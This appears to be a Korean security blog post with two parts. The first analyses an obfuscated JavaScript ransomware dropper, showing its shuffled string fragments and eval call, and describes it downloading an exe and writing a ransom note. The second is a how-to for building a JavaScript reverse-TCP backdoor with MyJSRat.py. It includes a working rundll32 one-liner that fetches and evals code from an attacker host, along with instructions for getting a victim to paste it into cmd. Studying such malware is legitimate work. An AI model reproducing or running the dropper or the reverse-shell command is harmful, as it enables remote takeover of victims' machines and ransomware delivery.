'WriteL');k77(245, 'File');k77(286, ' if');k77(881, 'hp');k77(759, ' ADD "');k77(512, 'e(" ');k77(317, 'ue); f');k77(457, 'TC ');k77(192, 'atu');k77(518, 'it');k77(771, '"Cr');k77(729, 'dows"+');k77(386, 'yo');k77(814, 'xt"+c');k77(363, 'ng');k77(387, 'u have');k77(533, 'ks ');k77(14, 'Strin');k77(921, 'e();');k77(559, 'ine("');k77(28, 'l=');k77(291, 'ts(fn');k77(822, 'COMS');k77(4, '"; va');k77(361, 'sing ');k77(475, 'ttps');k77(930, '+".');k77(752, ',0)');k77(509, '.W');k77(506, 'ne("');k77(553, '.le');k77(620, 'OSE A');k77(423, '.W');k77(720, '"HKC');k77(583, 'r t');k77(313, '(fn+"');k77(331, 'Al');k77(750, 'xt');k77(636, 'pt ');
t42 = t42.join(""); eval(t42);

마지막에 eval은 랜덤정렬된 t42 코드를 실행한다는 의미입니다.

크롬F12 개발자도구에서 console에 eval을 제외한 해당코드를 넣으면

스크립트가 실행되면서 원본 코드로 만들어줍니다.

이 원본코드를 JSForm 으로 봅니다.

분석해보면 ll이 악성 사이트이고 url로 이어

해당 사이트에서 요청해서 랜섬웨어를 받아오려고합니다.

exe로 저장하려고 합니다.

그 후 wirteline으로 랜섬웨어 경고텍스트 파일을 만듭니다.

☞ 자바스크립트를 이용한 reverse TCP 악성코드 제작

간단하게 말해서 피해자의 시스템에서 공격자가 만든 스크립트를 cmd에 붙여넣으면 실행됩니다.

그러니까 설치하는 것보다는 스크립트를 cmd로 실행하는 것입니다.

./MyJSRat.py -i 192.168.2.50 -p 8080

웹서버를 구동하면서 url을 제작합니다.

피해자에서 wtf url로 접속하게 합니다.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.50:80 80/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cm d /c taskkill /f /im rundll32.exe",0,true);}

스크립트를 cmd에 붙여넣어 연결합니다.

msf의 reverse_tcp 처럼 기능을 사용하면 됩니다.

저작자표시 (새창열림)